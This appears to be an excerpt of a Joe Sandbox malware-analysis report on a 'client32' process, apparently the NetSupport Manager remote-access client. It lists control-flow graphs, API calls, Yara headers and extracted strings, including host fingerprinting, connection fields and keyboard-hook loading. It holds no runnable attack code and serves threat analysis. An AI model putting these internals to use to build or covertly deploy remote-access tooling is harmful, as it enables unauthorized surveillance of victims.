                                                                                                                        • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$226546$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$RWh$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.4$V12.10.4$View$WPh$WRh$WRh$Windows 95$Windows Ding.wav$Windows XP Ding.wav$_debug$_debug$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaUI$jj$jj$jjjj$pcicl32$t&h$u.j$win8ui$|#j$\$s$|
                                                                                                                        • API String ID: 1866202007-448119206
                                                                                                                        • Opcode ID: 408c2fe09a5f6513f0d4732c7edee4b67311bb803a75e32f8b7f7cef0c5b0f00
                                                                                                                        • Instruction ID: b300946befec89326bcf45d0e3de5fe608372e51a41b6fb818d772ce7a29db62
                                                                                                                        • Opcode Fuzzy Hash: 408c2fe09a5f6513f0d4732c7edee4b67311bb803a75e32f8b7f7cef0c5b0f00
                                                                                                                        • Instruction Fuzzy Hash: F7B2FC74F4122A6BEB11DBE58C45FEDF7966B4470CF9040A8EA197B2C4FBB06940CB52

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1027 1102d5b0-1102d600 call 1110c420 1030 1102d602-1102d616 call 1113f0c0 1027->1030 1031 1102d618 1027->1031 1033 1102d61e-1102d663 call 1113e8f0 call 1113f130 1030->1033 1031->1033 1039 1102d803-1102d812 call 11141430 1033->1039 1040 1102d669 1033->1040 1046 1102d818-1102d828 1039->1046 1042 1102d670-1102d673 1040->1042 1044 1102d675-1102d677 1042->1044 1045 1102d698-1102d6a1 1042->1045 1047 1102d680-1102d691 1044->1047 1048 1102d6a7-1102d6ae 1045->1048 1049 1102d7d4-1102d7ed call 1113f130 1045->1049 1050 1102d82a 1046->1050 1051 1102d82f-1102d843 call 1102c850 1046->1051 1047->1047 1052 1102d693 1047->1052 1048->1049 1053 1102d7a3-1102d7b8 call 1115f5b7 1048->1053 1054 1102d6b5-1102d6b7 1048->1054 1055 1102d7ba-1102d7cf call 1115f5b7 1048->1055 1056 1102d74a-1102d77d call 1115e091 call 1113e8f0 1048->1056 1057 1102d78b-1102d7a1 call 11160790 1048->1057 1058 1102d73b-1102d745 1048->1058 1059 1102d77f-1102d789 1048->1059 1060 1102d6fc-1102d702 1048->1060 1061 1102d72c-1102d736 1048->1061 1049->1042 1079 1102d7f3-1102d7f5 1049->1079 1050->1051 1075 1102d848-1102d84d 1051->1075 1052->1049 1053->1049 1054->1049 1066 1102d6bd-1102d6f7 call 1115e091 call 1113e8f0 call 1102c850 1054->1066 1055->1049 1056->1049 1057->1049 1058->1049 1059->1049 1068 1102d704-1102d718 call 1115f5b7 1060->1068 1069 1102d71d-1102d727 1060->1069 1061->1049 1066->1049 1068->1049 1069->1049 1081 1102d8f3-1102d90d call 111429e0 1075->1081 1084 1102d853-1102d878 call 110b6bd0 call 11142a60 1075->1084 1079->1081 1082 1102d7fb-1102d801 1079->1082 1095 1102d963-1102d96f call 1102b120 1081->1095 1096 1102d90f-1102d928 call 1105d340 1081->1096 1082->1039 1082->1046 1103 1102d883-1102d889 1084->1103 1104 1102d87a-1102d881 1084->1104 1107 1102d971-1102d978 1095->1107 1108 1102d948-1102d94f 1095->1108 1096->1095 1106 1102d92a-1102d93c 1096->1106 1109 1102d88b-1102d892 call 110279d0 1103->1109 1110 1102d8e9 1103->1110 1104->1081 1106->1095 1123 1102d93e 1106->1123 1111 1102d955-1102d958 1107->1111 1113 1102d97a-1102d984 1107->1113 1108->1111 1112 1102db5a-1102db7b GetComputerNameA 1108->1112 1109->1110 1122 1102d894-1102d8c6 1109->1122 1110->1081 1119 1102d95a-1102d961 call 110b6bd0 1111->1119 1120 1102d989 1111->1120 1116 1102dbb3-1102dbb9 1112->1116 1117 1102db7d-1102dbb1 call 110278a0 1112->1117 1113->1112 1125 1102dbbb-1102dbc0 1116->1125 1126 1102dbef-1102dc02 call 11160790 1116->1126 1117->1116 1146 1102dc07-1102dc13 1117->1146 1121 1102d98c-1102da66 call 11027550 call 11027850 call 11027550 * 2 LoadLibraryA GetProcAddress 1119->1121 1120->1121 1175 1102db2a-1102db32 SetLastError 1121->1175 1176 1102da6c-1102da83 1121->1176 1139 1102d8d0-1102d8df call 110f3da0 1122->1139 1140 1102d8c8-1102d8ce 1122->1140 1123->1108 1129 1102dbc6-1102dbca 1125->1129 1145 1102ddf7-1102de1a 1126->1145 1136 1102dbe6-1102dbe8 1129->1136 1137 1102dbcc-1102dbce 1129->1137 1144 1102dbeb-1102dbed 1136->1144 1142 1102dbe2-1102dbe4 1137->1142 1143 1102dbd0-1102dbd6 1137->1143 1148 1102d8e2-1102d8e4 call 1102cde0 1139->1148 1140->1139 1140->1148 1142->1144 1143->1136 1150 1102dbd8-1102dbe0 1143->1150 1144->1126 1144->1146 1160 1102de42-1102de4a 1145->1160 1161 1102de1c-1102de22 1145->1161 1155 1102dc15-1102dc2a call 110b6bd0 call 11029870 1146->1155 1156 1102dc2c-1102dc3f call 11080b10 1146->1156 1148->1110 1150->1129 1150->1142 1181 1102dc83-1102dc9c call 11080b10 1155->1181 1172 1102dc41-1102dc64 1156->1172 1173 1102dc66-1102dc68 1156->1173 1164 1102de5c-1102dee8 call 1115e091 * 2 call 11142a60 * 2 GetCurrentProcessId call 110ebb00 call 11027900 call 11142a60 call 1115e4d1 1160->1164 1165 1102de4c-1102de59 call 1113f120 call 1115e091 1160->1165 1161->1160 1163 1102de24-1102de3d call 1102cde0 1161->1163 1163->1160 1165->1164 1172->1181 1174 1102dc70-1102dc81 1173->1174 1174->1174 1174->1181 1185 1102daf3-1102daff 1175->1185 1176->1185 1197 1102da85-1102da8e 1176->1197 1199 1102dca2-1102dd1d call 11142a60 call 110cd950 call 110cf1b0 call 110b6bd0 wsprintfA call 110b6bd0 wsprintfA 1181->1199 1200 1102dddc-1102dde9 call 11160790 1181->1200 1189 1102db42-1102db51 1185->1189 1190 1102db01-1102db0d 1185->1190 1189->1112 1193 1102db53-1102db54 FreeLibrary 1189->1193 1195 1102db1f-1102db23 1190->1195 1196 1102db0f-1102db1d GetProcAddress 1190->1196 1193->1112 1202 1102db34-1102db36 SetLastError 1195->1202 1203 1102db25-1102db28 1195->1203 1196->1195 1197->1185 1201 1102da90-1102dac6 call 11142a60 call 11128350 1197->1201 1239 1102dd33-1102dd49 call 11125f90 1199->1239 1240 1102dd1f-1102dd2e call 110290f0 1199->1240 1218 1102ddec-1102ddf1 CharUpperA 1200->1218 1201->1185 1222 1102dac8-1102daee call 11142a60 call 11027590 1201->1222 1209 1102db3c 1202->1209 1203->1209 1209->1189 1218->1145 1222->1185 1244 1102dd62-1102dd9c call 110ce900 * 2 1239->1244 1245 1102dd4b-1102dd5d call 110ce900 1239->1245 1240->1239 1252 1102ddb2-1102ddda call 11160790 call 110ce4f0 1244->1252 1253 1102dd9e-1102ddad call 110290f0 1244->1253 1245->1244 1252->1218 1253->1252
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memsetwsprintf
                                                                                                                        • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$226546$30/10/15 13:45:13 V12.10F4$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                                        • API String ID: 1984265443-2842706374
                                                                                                                        • Opcode ID: 38c7c6f243f953fd73c3e761b2ebc1a9b74cfbed7768dff45ff639fbb013f980
                                                                                                                        • Instruction ID: 4fcf39a05b1f5517457e0201ca3c447b40b49c63e9df5c66bfbc6ef5231c6bdf
                                                                                                                        • Opcode Fuzzy Hash: 38c7c6f243f953fd73c3e761b2ebc1a9b74cfbed7768dff45ff639fbb013f980
                                                                                                                        • Instruction Fuzzy Hash: D632B375D0026A9FDB12DFA4CC90BEDB7B9BB44308F8045E9E559A7240EB706E84CF61

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1259 685a3d00-685a3d42 call 685b1c50 call 685a3b80 1263 685a3d47-685a3d4f 1259->1263 1264 685a3d6c-685a3d6e 1263->1264 1265 685a3d51-685a3d6b call 685b28e1 1263->1265 1267 685a3d70-685a3d84 call 68596f50 1264->1267 1268 685a3d87-685a3da1 call 68598fb0 1264->1268 1267->1268 1274 685a3da3-685a3dc4 call 685963c0 call 685b28e1 1268->1274 1275 685a3dc5-685a3e44 call 68595e90 * 2 call 685a7be0 call 68595e20 lstrlenA 1268->1275 1288 685a3e98-685a3fbe call 68595500 call 68596050 call 685a7c70 * 2 call 685a7d00 * 3 call 68595060 call 685a7d00 call 685b1bfd call 685a7d00 gethostname call 685a7d00 call 6859b8e0 1275->1288 1289 685a3e46-685a3e95 call 685ad8b0 call 68595060 call 68594830 call 685b1bfd 1275->1289 1324 685a3fc0 1288->1324 1325 685a3fc5-685a3fe1 call 685a7d00 1288->1325 1289->1288 1324->1325 1328 685a3ff8-685a3ffe 1325->1328 1329 685a3fe3-685a3ff5 call 685a7d00 1325->1329 1331 685a421a-685a4263 call 685a7b60 call 685b1bfd call 685998d0 call 685a77e0 1328->1331 1332 685a4004-685a4022 call 68595e20 1328->1332 1329->1328 1359 685a4292-685a42aa call 685b28e1 1331->1359 1360 685a4265-685a4291 call 6859a4e0 call 685b28e1 1331->1360 1338 685a405a-685a4084 call 68595e20 1332->1338 1339 685a4024-685a4057 call 68595060 call 685a7d00 call 685b1bfd 1332->1339 1347 685a408a-685a41ce call 68595060 call 685a7d00 call 685b1bfd call 68595e20 call 68595060 call 685a7d00 call 685b1bfd call 68595e20 call 68595060 call 685a7d00 call 685b1bfd call 68595e20 call 68595060 call 685a7d00 call 685b1bfd 1338->1347 1348 685a41d1-685a4217 call 685a7d00 call 68595e20 call 685a7d00 1338->1348 1339->1338 1347->1348 1348->1331
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset
                                                                                                                        • String ID: *Dept$*Gsk$1.1$226546$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                                        • API String ID: 2102423945-1702074230
                                                                                                                        • Opcode ID: 16c8762505f452347963c145f71cddefc6238d18a80335e6c131ef3a20951167
                                                                                                                        • Instruction ID: 44891fd80584a1afe0cb340a92391f0779c0d43f19a44a21a32dfc9e2d24338d
                                                                                                                        • Opcode Fuzzy Hash: 16c8762505f452347963c145f71cddefc6238d18a80335e6c131ef3a20951167
                                                                                                                        • Instruction Fuzzy Hash: 91E182B6C4061CAACB21DB648C90FFFB778AF99205FC045D9E90963141EB356F848FA5

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1400 1113fbe0-1113fc21 GetModuleFileNameA 1401 1113fc63 1400->1401 1402 1113fc23-1113fc36 call 11080be0 1400->1402 1404 1113fc69-1113fc6d 1401->1404 1402->1401 1408 1113fc38-1113fc61 LoadLibraryA 1402->1408 1406 1113fc89-1113fca7 GetModuleHandleA GetProcAddress 1404->1406 1407 1113fc6f-1113fc7c LoadLibraryA 1404->1407 1410 1113fcb7-1113fce0 GetProcAddress * 4 1406->1410 1411 1113fca9-1113fcb5 1406->1411 1407->1406 1409 1113fc7e-1113fc86 LoadLibraryA 1407->1409 1408->1404 1409->1406 1412 1113fce3-1113fd5b GetProcAddress * 10 call 1115e4d1 1410->1412 1411->1412 1414 1113fd60-1113fd63 1412->1414
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,8504C483,74DF23A0), ref: 1113FC13
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 1113FC5C
                                                                                                                        • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 1113FC75
                                                                                                                        • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 1113FC84
                                                                                                                        • GetModuleHandleA.KERNEL32(?), ref: 1113FC8A
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1113FC9E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1113FCBD
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 1113FCC8
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 1113FCD3
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1113FCDE
                                                                                                                        • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 1113FCE9
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 1113FCF4
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1113FCFF
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1113FD0A
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 1113FD15
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 1113FD20
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1113FD2B
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 1113FD36
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 1113FD41
                                                                                                                        • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 1113FD4C
                                                                                                                          • Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                                                        • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                                                        • API String ID: 3874234733-2061581830
                                                                                                                        • Opcode ID: a663583c766d6c91d1e2bc8e78e71f3cffff341cab0567ac53c27f630418ddde
                                                                                                                        • Instruction ID: 7823fe44ffa72cf0609a50e83b8fe1e4d3ef80fae5d5290087d1941409006158
                                                                                                                        • Opcode Fuzzy Hash: a663583c766d6c91d1e2bc8e78e71f3cffff341cab0567ac53c27f630418ddde
                                                                                                                        • Instruction Fuzzy Hash: 8A413F70A00B05AFD7209F7A8CC8E6AFBF8FF59715B04496EE485D3690E774E8408B59

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1500 1113dad0-1113db15 call 11142a60 1503 1113dba7-1113dbd3 call 1113f4f0 call 111434f0 LoadLibraryA 1500->1503 1504 1113db1b-1113db3d call 1105d340 1500->1504 1516 1113dc07 1503->1516 1517 1113dbd5-1113dbdc 1503->1517 1509 1113db8b-1113db92 1504->1509 1510 1113db3f-1113db5c call 11015e10 1504->1510 1509->1503 1514 1113db94-1113dba0 call 11017670 1509->1514 1520 1113db5e-1113db6b GetProcAddress 1510->1520 1521 1113db6d-1113db6f 1510->1521 1514->1503 1524 1113dba2 call 110cb920 1514->1524 1523 1113dc11-1113dc31 GetClassInfoExA 1516->1523 1517->1516 1522 1113dbde-1113dbe5 1517->1522 1520->1521 1525 1113db71-1113db73 SetLastError 1520->1525 1532 1113db79-1113db82 1521->1532 1522->1516 1526 1113dbe7-1113dc05 call 1105d340 1522->1526 1527 1113dc37-1113dc5f call 1115e4f0 call 11140b20 1523->1527 1528 1113dcd9-1113dd34 1523->1528 1524->1503 1525->1532 1526->1523 1541 1113dc61-1113dc75 call 110290f0 1527->1541 1542 1113dc78-1113dcc0 call 11140b20 call 11140b50 LoadCursorA GetStockObject RegisterClassExA 1527->1542 1543 1113dd36-1113dd3d 1528->1543 1544 1113dd6e-1113dd75 1528->1544 1532->1509 1536 1113db84-1113db85 FreeLibrary 1532->1536 1536->1509 1541->1542 1542->1528 1569 1113dcc2-1113dcd6 call 110290f0 1542->1569 1543->1544 1546 1113dd3f-1113dd46 1543->1546 1548 1113ddb1-1113ddd5 call 1105d340 1544->1548 1549 1113dd77-1113dd86 call 1110c420 1544->1549 1546->1544 1552 1113dd48-1113dd5f call 11129900 LoadLibraryA 1546->1552 1559 1113dde3-1113dde8 1548->1559 1560 1113ddd7-1113dde1 1548->1560 1563 1113ddaa 1549->1563 1564 1113dd88-1113dda8 1549->1564 1552->1544 1568 1113dd61-1113dd69 GetProcAddress 1552->1568 1566 1113ddf4-1113ddfb 1559->1566 1567 1113ddea 1559->1567 1560->1566 1565 1113ddac 1563->1565 1564->1565 1565->1548 1570 1113de08-1113de25 call 11139490 1566->1570 1571 1113ddfd-1113de03 call 110f58a0 1566->1571 1567->1566 1568->1544 1569->1528 1578 1113de2b-1113de32 1570->1578 1579 1113deda-1113deea 1570->1579 1571->1570 1580 1113de34-1113de46 call 1110c420 1578->1580 1581 1113de6f-1113de76 1578->1581 1590 1113de61 1580->1590 1591 1113de48-1113de5f call 11159ed0 1580->1591 1583 1113de78-1113de7f 1581->1583 1584 1113de9f-1113deb0 1581->1584 1586 1113de81 call 11131d10 1583->1586 1587 1113de86-1113de9a SetTimer 1583->1587 1588 1113deb2-1113deb9 1584->1588 1589 1113dec9-1113ded4 #17 LoadLibraryA 1584->1589 1586->1587 1587->1584 1588->1589 1593 1113debb-1113dec2 1588->1593 1589->1579 1596 1113de63-1113de6a 1590->1596 1591->1596 1593->1589 1594 1113dec4 call 1112a760 1593->1594 1594->1589 1596->1581
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1113DB64
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 1113DB73
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 1113DB85
                                                                                                                        • LoadLibraryA.KERNEL32(imm32,?,?,00000002,00000000), ref: 1113DBC4
                                                                                                                        • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 1113DC29
                                                                                                                        • _memset.LIBCMT ref: 1113DC3D
                                                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 1113DC8F
                                                                                                                        • GetStockObject.GDI32(00000000), ref: 1113DC9A
                                                                                                                        • LoadLibraryA.KERNEL32(pcihooks,?,?,00000002,00000000), ref: 1113DD52
                                                                                                                        • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 1113DD67
                                                                                                                        • RegisterClassExA.USER32(?), ref: 1113DCB5
                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                        • SetTimer.USER32(00000000,00000000,000003E8,11139470), ref: 1113DE94
                                                                                                                        • #17.COMCTL32(?,?,?,00000002,00000000), ref: 1113DEC9
                                                                                                                        • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000002,00000000), ref: 1113DED4
                                                                                                                          • Part of subcall function 11015E10: LoadLibraryA.KERNEL32(User32.dll), ref: 11015E18
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$AddressClassProc$CursorErrorFreeInfoLastObjectRegisterStockTimer__wcstoi64_memset
                                                                                                                        • String ID: *DisableDPIAware$*quiet$Client$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$SetProcessDPIAware$TraceCopyData$UI.CPP$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                                                        • API String ID: 2794364348-3534351892
                                                                                                                        • Opcode ID: 571120301c2cbdaac190665f23ae6cd54b107ab8e29346c4d7356b84dcf3b421
                                                                                                                        • Instruction ID: eeaa44aaf805afce620a012973528e55005956dd55c3add89e5b481fbdd40cac
                                                                                                                        • Opcode Fuzzy Hash: 571120301c2cbdaac190665f23ae6cd54b107ab8e29346c4d7356b84dcf3b421
                                                                                                                        • Instruction Fuzzy Hash: FCB1F674A1122A9FDB02DFE1CD88BADFBB5AB8472EF904138E525972C8F7745040CB56

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
